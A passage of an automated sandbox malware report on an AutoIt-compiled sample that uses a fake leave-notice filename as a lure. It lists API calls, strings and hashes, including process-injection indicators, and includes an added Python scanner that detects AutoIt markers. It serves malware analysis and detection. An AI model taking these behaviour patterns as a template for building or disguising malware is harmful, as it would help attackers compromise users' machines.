                                                      • Opcode ID: 3a9458621b904b6f019852242c00f847da511d070bf6337280adc00bdfd2a45b
                                                      • Instruction ID: 50eb838321469fa49db2935fc4a307447ec62b450f262fe7b5315853994a4c9e
                                                      • Opcode Fuzzy Hash: 3a9458621b904b6f019852242c00f847da511d070bf6337280adc00bdfd2a45b
                                                      • Instruction Fuzzy Hash: F8116071A0010DBEEB15EBE4CD8AEFF7BACEF04354F004068B546D6151EA75AE01A760
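The strings surfaced in these listings (">>>AUTOIT SCRIPT<<<" in the _wcs* routine above, the "AutoIt v3" window class, and the "Software\AutoIt v3\AutoIt" registry key with its "Include" value here) are the static markers behind the report's "Binary is likely a compiled AutoIt script file" verdict. The Python below is an added example, not Joe Sandbox code and not code from the sample, that scans a file for those markers in both ASCII and UTF-16LE (the runtime handles them through wide-string routines). The sample blob is constructed for the demonstration, not bytes from the analysed file, and the rule that the window class plus the registry key together count as a hit is this example's own heuristic.

```python
"""Scan a PE (or any byte blob) for the compiled-AutoIt markers that the
report surfaces as strings. Added example, not Joe Sandbox or sample code."""
import re
import sys

# Markers taken from the String IDs in the report above; each is searched in
# ASCII and UTF-16LE because the interpreter handles them via wcs* routines.
AUTOIT_MARKERS = {
    "script_marker": ">>>AUTOIT SCRIPT<<<",
    "window_class": "AutoIt v3",
    "registry_key": "Software\\AutoIt v3\\AutoIt",
}


def _encodings(text):
    return {"ascii": text.encode("ascii"), "utf-16le": text.encode("utf-16-le")}


def find_autoit_markers(data: bytes) -> dict:
    """Return {marker_name: [(encoding, offset), ...]} for every hit."""
    hits = {}
    for name, text in AUTOIT_MARKERS.items():
        for enc, needle in _encodings(text).items():
            for m in re.finditer(re.escape(needle), data):
                hits.setdefault(name, []).append((enc, m.start()))
    return hits


def is_probably_autoit(data: bytes) -> bool:
    """Heuristic (this example's own, not the sandbox's rule): the script
    marker alone is decisive; otherwise require both the window class and
    the registry key, which the interpreter carries even when the script
    resource itself is encrypted."""
    hits = find_autoit_markers(data)
    if "script_marker" in hits:
        return True
    return "window_class" in hits and "registry_key" in hits


def scan_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return find_autoit_markers(fh.read())


# Constructed sample: a fake blob carrying the markers in the encodings an
# AutoIt-compiled PE uses; these are not bytes from the analysed sample.
SAMPLE_BLOB = (
    b"MZ" + b"\x00" * 62
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le") + b"\x00\x00"
    + b">>>AUTOIT SCRIPT<<<" + b"\x00"
)

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for name, locs in sorted(find_autoit_markers(blob).items()):
        print(f"{name:14} {locs}")
    print("verdict:", "compiled AutoIt" if is_probably_autoit(blob) else "no AutoIt markers")
```

A hit identifies the AutoIt runtime, which plenty of legitimate software ships with, so it is a triage signal rather than a malware verdict: the next step is to extract and decompile the embedded script resource. The markers can also be absent from a packed or encrypted outer layer, in which case the same scan over a memory dump taken after unpacking (as the sandbox did here) is the more reliable check.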

                                                      Control-flow Graph

                                                       Control-flow graph not rendered here (legend: Executed / Not Executed). The function is a single basic block, f836b8-f83728, calling CreateWindowExW twice and ShowWindow twice.
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F836E6
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83707
                                                      • ShowWindow.USER32(00000000,?,?,?,?,00F83AA3,?), ref: 00F8371B
                                                      • ShowWindow.USER32(00000000,?,?,?,?,00F83AA3,?), ref: 00F83724
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: b459c7c46051a060964a594ec7cc2e29b9fa3d346b1130952de31011a9ebe24e
                                                      • Instruction ID: e40515e9e25362dd40389fd8c434dddd6fa2e2a283d877606c3eed285106e56a
                                                      • Instruction Fuzzy Hash: 64F030B56802D07BD7315697AD4CE672E7DE7C6F20F00001FBA4892158C1BA2881CB70

                                                      Control-flow Graph
                                                      • Function 1a4c190-1a4c2ca (graph node 1262): calls 1a49de0, 1a4c080, CreateFileW; successor nodes cover 1a4c2cc-1a4c386 with VirtualAlloc, ReadFile, calls to 1a4c0c0, 1a4b080, 1a4c110, and ExitProcess
                                                      APIs
                                                        • Part of subcall function 01A4C080: Sleep.KERNELBASE(000001F4), ref: 01A4C091
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01A4C2C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130782459.0000000001A49000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A49000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a49000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: 946KWMH74B9KA1NT8X8YXF
                                                      • API String ID: 2694422964-2880569617
                                                      • Opcode ID: d595a9908eef6d3b91b0ab6f25c7fdad2b59237345bb6b90d4b375b5e7c8e345
                                                      • Instruction ID: 295963f3cb1573bcc010b0a304db355c4baac4e0b113b7a7aab2943e1494a796
                                                      • Instruction Fuzzy Hash: FB518130D05288DBEF11DBF4C844BEEBBB9AF59314F044199E2487B2C1D6B91B45CBA5

                                                      Control-flow Graph
                                                      • Function f851af-f851c5 (graph node 1286): successor nodes cover f851cb-f852b0 and ff3ca1-ff3cf7 with calls to f86b0f, f86a63, f8510d, f84db1, f8518c, f86eed, fa0d50, f850e6, fa0d23, f8cb37, LoadStringW, Shell_NotifyIconW
                                                      APIs
                                                      • _memset.LIBCMT ref: 00F8522F
                                                      • _wcscpy.LIBCMT ref: 00F85283
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F85293
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FF3CB0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                      • String ID: Line:
                                                      • API String ID: 1053898822-1585850449
                                                      • Opcode ID: cb0fbd8658d4931dc57483cedc3f3da8e2af7e569664a0345f30aab96a9d8122
                                                      • Instruction ID: de49a40b8fb25e51b0809154c5e7a84efbfc1390d5eb0e492665d33a71147963
                                                      • Instruction Fuzzy Hash: 3D31ADB2508740ABC735FBA0EC86FDA77D8AF44710F00451EF5C596091EFB8A648AB96
                                                      APIs
                                                        • Part of subcall function 00F841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00F839FE,?,00000001), ref: 00F841DB
                                                      • _free.LIBCMT ref: 00FF36B7
                                                      • _free.LIBCMT ref: 00FF36FE
                                                        • Part of subcall function 00F8C833: __wsplitpath.LIBCMT ref: 00F8C93E
                                                        • Part of subcall function 00F8C833: _wcscpy.LIBCMT ref: 00F8C953
                                                        • Part of subcall function 00F8C833: _wcscat.LIBCMT ref: 00F8C968
                                                        • Part of subcall function 00F8C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00F8C978
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                      • API String ID: 805182592-1757145024
                                                      • Opcode ID: 5a2553984d6043abf731955179d1d871854df8f4f0e4772c46901d8b9673e65c
                                                      • Instruction ID: 5d9bc3f765d1f4eeb5e15d9849b6d105355b62ed86f43f8e0e2dc763f2c21edb
                                                      • Instruction Fuzzy Hash: 9B914171910219AFCF04EFA4CC919FDB7B4BF58310F144429F516EB2A1DB74AA45EB90
                                                      APIs
                                                        • Part of subcall function 00F85374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01041148,?,00F861FF,?,00000000,00000001,00000000), ref: 00F85392
                                                        • Part of subcall function 00F849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00F84A1D
                                                      • _wcscat.LIBCMT ref: 00FF2D80
                                                      • _wcscat.LIBCMT ref: 00FF2DB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileModuleNameOpen
                                                      • String ID: \$\Include\
                                                      • API String ID: 3592542968-2640467822
                                                      • Opcode ID: 673f367e1982707818516e746aa69b9c7706dc93afd60a22eb6a518d95f14dd4
                                                      • Instruction ID: 65d090006b4dc9bf801d67f096cceddcd7642d11576740f0846bddcc9a18f588
                                                      • Instruction Fuzzy Hash: C45162BD6043409BC324EF55FAC18AEB7F4BFA9310B40452EF68493265DB399544DB51
                                                      APIs
                                                      • __getstream.LIBCMT ref: 00FA34FE
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00FA3539
                                                      • __wopenfile.LIBCMT ref: 00FA3549
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                      • String ID: <G
                                                      • API String ID: 1820251861-2138716496
                                                      • Opcode ID: faf16f10fd0720a45b7997db3148d168df05255265b80627b9a4717c1e4be13b
                                                      • Instruction ID: 4fcc560a4c2082d35e98ce8a2846abb4fd7bb9569780778bfefcfb08b61e7b32
                                                      • Instruction Fuzzy Hash: 9211CAF1E003069FDB11FF759C4266E76A4AF4B360B198525F815DB181EB38CA11B7A1
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F9D28B,SwapMouseButtons,00000004,?), ref: 00F9D2BC
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F9D28B,SwapMouseButtons,00000004,?,?,?,?,00F9C865), ref: 00F9D2DD
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00F9D28B,SwapMouseButtons,00000004,?,?,?,?,00F9C865), ref: 00F9D2FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: cc1d807544f83c774fde0878719fc294fbebb51810ac155e41a8f59d65f1ebc0
                                                      • Instruction ID: ec86d2e9fc9dca09350708c3f387056cb68ecdd754b6abc562e0dc571cf19657
                                                      • Instruction Fuzzy Hash: 13113975A11208BFEF218FA8C884EAF7BBCEF54755F204469F805D7110E631AE41AB60
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01A4B83B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A4B8D1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A4B8F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130782459.0000000001A49000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A49000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a49000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                      • Instruction ID: 0a69e073a8706fb794719519afa96fc45756a91c6b9010afe1646d2aa7da633e
                                                      • Instruction Fuzzy Hash: 4962FD30A14258DBEB24CFA4C850BDEB776EF98300F1091A9D10DEB395E7759E81CB69
                                                      APIs
                                                        • Part of subcall function 00F84517: _fseek.LIBCMT ref: 00F8452F
                                                        • Part of subcall function 00FCC56D: _wcscmp.LIBCMT ref: 00FCC65D
                                                        • Part of subcall function 00FCC56D: _wcscmp.LIBCMT ref: 00FCC670
                                                      • _free.LIBCMT ref: 00FCC4DD
                                                      • _free.LIBCMT ref: 00FCC4E4
                                                      • _free.LIBCMT ref: 00FCC54F
                                                        • Part of subcall function 00FA1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00FA7A85), ref: 00FA1CB1
                                                        • Part of subcall function 00FA1C9D: GetLastError.KERNEL32(00000000,?,00FA7A85), ref: 00FA1CC3
                                                      • _free.LIBCMT ref: 00FCC557
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID:
                                                      • API String ID: 1552873950-0
                                                      • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                      • Instruction ID: 63461372c5281b57b50f6059e3dcf5fc980c7b6c8578311adc5946fe25bfa38b
                                                      • Instruction Fuzzy Hash: 25516DB5904219AFDB149F64DC82BEDBBB9FF48310F00049EF608A3241DB756A809F58
                                                      APIs
                                                      • _memset.LIBCMT ref: 00F9EBB2
                                                        • Part of subcall function 00F851AF: _memset.LIBCMT ref: 00F8522F
                                                        • Part of subcall function 00F851AF: _wcscpy.LIBCMT ref: 00F85283
                                                        • Part of subcall function 00F851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F85293
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00F9EC07
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F9EC16
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FF3C88
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      • Opcode ID: 34c8061d1f3c49323e812f5a16a502a624e5fe406741671e35910d6a06de9428
                                                      • Instruction ID: d9a685d496864e46104571eb15413f5aa2a916d9b7fe675df9a2c6450b2484fc
                                                      • Instruction Fuzzy Hash: 7821F5719047849FEB33DB688859BE7BBEC9F01318F04008DE6CE56242C7B46A84DB51
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FF3725
                                                      • GetOpenFileNameW.COMDLG32 ref: 00FF376F
                                                        • Part of subcall function 00F8660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F853B1,?,?,00F861FF,?,00000000,00000001,00000000), ref: 00F8662F
                                                        • Part of subcall function 00F840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F840C6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                      • String ID: X
                                                      • API String ID: 3777226403-3081909835
                                                      • Opcode ID: d3c598ddc6a787b4330621ed58f2605d5c7ce8f93d04a11f93ce418f837b6e1a
                                                      • Instruction ID: b2106e73e50b4379befe196584428e3aa6645aa3d2a3dfe9bc455ab7e085c70f
                                                      • Instruction Fuzzy Hash: E721A4B1A101889BCB15EFD4CC457EE7BF8AF49304F008059E544EB241DBB86A899F65
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00FCC72F
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00FCC746
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 0aff4dd18b4f171c6fb217730c64aa27886f4b09afa446011695196127e7caff
                                                      • Instruction ID: 303605269a1ca6932f01c683c50b8e7094968b077021101231ea75b064d26492
                                                      • Opcode Fuzzy Hash: 0aff4dd18b4f171c6fb217730c64aa27886f4b09afa446011695196127e7caff
                                                      • Instruction Fuzzy Hash: 5DD05E7150030EABDB20ABD0DC4EF8A776CA710704F0001A17690A90A1DAB9E6998B64
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c491edb8d155f69e7672336daba640619e04063ae964c5da22d67bcb1c8bb9bf
                                                      • Instruction ID: 8372948cef3bd81541a12f56cd988b07f86ab026a61d335726f5aa45c62f421b
                                                      • Opcode Fuzzy Hash: c491edb8d155f69e7672336daba640619e04063ae964c5da22d67bcb1c8bb9bf
                                                      • Instruction Fuzzy Hash: 05F16C71A043019FC710DF24C881B5AB7E6BF88314F14892EF9969B392D774E949DB82
                                                      APIs
                                                      • _memset.LIBCMT ref: 00F85022
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F850CB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell__memset
                                                      • String ID:
                                                      • API String ID: 928536360-0
                                                      • Opcode ID: abf3e786f206f37bfd138dd206ac1c4b9af5b40c1801f1612ebd538a3e320ecf
                                                      • Instruction ID: 0c0144d0f94ddebe9d68e3b1de065e01e53221c23237e70579ed6a4a44f53292
                                                      • Opcode Fuzzy Hash: abf3e786f206f37bfd138dd206ac1c4b9af5b40c1801f1612ebd538a3e320ecf
                                                      • Instruction Fuzzy Hash: 64319CB1A047019FC731EF64D9856DBBBE8FF48714F00092EF69A82240E776A944DB92
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 00FA3973
                                                        • Part of subcall function 00FA81C2: __NMSG_WRITE.LIBCMT ref: 00FA81E9
                                                        • Part of subcall function 00FA81C2: __NMSG_WRITE.LIBCMT ref: 00FA81F3
                                                      • __NMSG_WRITE.LIBCMT ref: 00FA397A
                                                        • Part of subcall function 00FA821F: GetModuleFileNameW.KERNEL32(00000000,01040312,00000104,00000000,00000001,00000000), ref: 00FA82B1
                                                        • Part of subcall function 00FA821F: ___crtMessageBoxW.LIBCMT ref: 00FA835F
                                                        • Part of subcall function 00FA1145: ___crtCorExitProcess.LIBCMT ref: 00FA114B
                                                        • Part of subcall function 00FA1145: ExitProcess.KERNEL32 ref: 00FA1154
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      • RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,00F9F507,?,0000000E), ref: 00FA399F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: 3c0c347c565f748be81c4a6c0e7116029185efc9f3195bd2f889140285ba3bd8
                                                      • Instruction ID: d01bc3f4c7e0516ac865027d03ab5bd8456ee60ff5dc074441e2645db06d79c5
                                                      • Opcode Fuzzy Hash: 3c0c347c565f748be81c4a6c0e7116029185efc9f3195bd2f889140285ba3bd8
                                                      • Instruction Fuzzy Hash: 9501B5FA745311ABE6213B68EC42B6B33599F8B770F210025F905DB185DFF9DD01A6A0
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00FCC385,?,?,?,?,?,00000004), ref: 00FCC6F2
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00FCC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00FCC708
                                                      • CloseHandle.KERNEL32(00000000,?,00FCC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FCC70F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: 40a8901ecbeaa71c0aa462e0f23dbcc3055c8f24536163501f6f387b68a0a7a3
                                                      • Instruction ID: 4a260933cf895ebc197ba70d297e6cc50a79dabcae67c4491086e7d72cab0bd5
                                                      • Opcode Fuzzy Hash: 40a8901ecbeaa71c0aa462e0f23dbcc3055c8f24536163501f6f387b68a0a7a3
                                                      • Instruction Fuzzy Hash: CDE0E632181214B7D7321BD4AC0AFCA7F59EB05B71F104210FB55690D197B6655197A8
                                                      APIs
                                                      • _free.LIBCMT ref: 00FCBB72
                                                        • Part of subcall function 00FA1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00FA7A85), ref: 00FA1CB1
                                                        • Part of subcall function 00FA1C9D: GetLastError.KERNEL32(00000000,?,00FA7A85), ref: 00FA1CC3
                                                      • _free.LIBCMT ref: 00FCBB83
                                                      • _free.LIBCMT ref: 00FCBB95
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                      • Instruction ID: 8f0fb8188ed41f39d54fba94710b0dbf8cad6da3c1e398078f4f43a3d43ed424
                                                      • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                      • Instruction Fuzzy Hash: 68E0C2E9A0070242CA2065786F46FF333CC1F45331F04080DB419E3142CF28EC40A4B4
                                                      APIs
                                                        • Part of subcall function 00F822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F824F1), ref: 00F82303
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F825A1
                                                      • CoInitialize.OLE32(00000000), ref: 00F82618
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FF503A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 3815369404-0
